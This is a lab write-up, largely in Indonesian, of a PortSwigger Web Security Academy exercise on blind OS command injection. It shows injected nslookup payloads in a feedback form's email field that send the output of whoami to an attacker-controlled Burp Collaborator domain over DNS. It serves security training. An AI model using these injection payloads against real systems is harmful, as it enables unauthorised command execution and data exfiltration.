> For the complete documentation index, see [llms.txt](https://easpyy.gitbook.io/portswigger/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://easpyy.gitbook.io/portswigger/blind-os-command-injection-with-out-of-band-data-exfiltration.md).

# Blind OS command injection with out-of-band data exfiltration

Link: https\://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration

Description:

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application's response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.

To solve the lab, execute the `whoami` command and exfiltrate the output via a DNS query to Burp Collaborator. You will need to enter the name of the current user to complete the lab.

Proof of concept:

1. Lakukan analisa pada web target<br>

   <figure><img src="https://261650435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdAiS2nxqUmGSg5rZoOOl%2Fuploads%2F56c0vcH2lgcpUjM2OHzn%2Fimage%20(69).png?alt=media&amp;token=9eb2f774-533c-40c0-84c5-a054a92df20c" alt=""><figcaption></figcaption></figure>
2. Terdapat fitur `Submit feedback` yang didalamnya terdapat parameter `email`<br>

   <figure><img src="https://261650435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdAiS2nxqUmGSg5rZoOOl%2Fuploads%2FZsZawdkBLSVTVIr2y39l%2Fimage.png?alt=media&amp;token=f94e00bd-bf31-43c1-b70a-1e5babcf6b64" alt=""><figcaption></figcaption></figure>
3. Lakukan injeksi pada parameter `email` , gunakan payload basic blind OS command injection yaitu `;nslookup <<domain attacker>>;` . Pada kasus ini, domain attacker hanya berfungsi ketika menggunakan domain dari burp suite collabolator. Jika sudah diinjeksikan, kirim request tersebut<br>

   <figure><img src="https://261650435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdAiS2nxqUmGSg5rZoOOl%2Fuploads%2FQ2gVrWshfalBfEzCmxLt%2Fimage.png?alt=media&amp;token=82650514-8e7f-49cc-841d-73a6a658aa85" alt=""><figcaption></figcaption></figure>
4. Pada burp suite collabolator, klik `Poll now` dan request pun berhasil diterima oleh burp suite collabolator. Artinya parameter `email` pada endpoint `submit feedback` rentan terhadap OS command injection<br>

   <figure><img src="https://261650435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdAiS2nxqUmGSg5rZoOOl%2Fuploads%2FXdIEAFvqI8MTtr6Icqq1%2Fimage.png?alt=media&amp;token=3519fbd7-3137-444f-90be-e89a6a306af3" alt=""><figcaption></figcaption></figure>
5. Untuk dapat menyelesaikan tangtangan pada lab ini, harus mendapatkan user server yang sedang berjalan. Untuk dapat mendapatkan informasi tersebut dapat menggunakan payload `;nslookup $(whoami).<<domain.attacker>>;`. Jika sudah, kirim request tersebut dan lakukan `Poll now` kembali pada burp collabolator<br>

   <figure><img src="https://261650435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdAiS2nxqUmGSg5rZoOOl%2Fuploads%2F4oFZ2QLTwC9mxdetaRVy%2Fimage.png?alt=media&amp;token=ddd5b704-5ec4-4846-881c-2e0625e92d8b" alt=""><figcaption></figcaption></figure>
6. Dan terlihat nama user server yang sedang berjalan pada service web ini adalah `peter-pI8qNt`. Submit user tersebut agar dapat menyelesaikan tantangan pada lab ini<br>

   <figure><img src="https://261650435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdAiS2nxqUmGSg5rZoOOl%2Fuploads%2FFrQpeXpoa1hnTDhDID8S%2Fimage.png?alt=media&amp;token=ec2fb33d-6ae4-4ccd-bd94-a0fac5b69f1c" alt=""><figcaption></figcaption></figure>

   <figure><img src="https://261650435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdAiS2nxqUmGSg5rZoOOl%2Fuploads%2FiAnmtac2hQTQkK6qumFd%2Fimage.png?alt=media&amp;token=db517982-4bf3-482a-a6f2-7b3a0f8a7033" alt=""><figcaption></figcaption></figure>

   <figure><img src="https://261650435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdAiS2nxqUmGSg5rZoOOl%2Fuploads%2F60BgWsxNlV1PLHPRNRxC%2Fimage%20(76).png?alt=media&amp;token=c0a8a120-d030-4364-bbc0-3400a6f665fe" alt=""><figcaption></figcaption></figure>

Thanks, Stay Ethical & Happy Hacking! 🍻
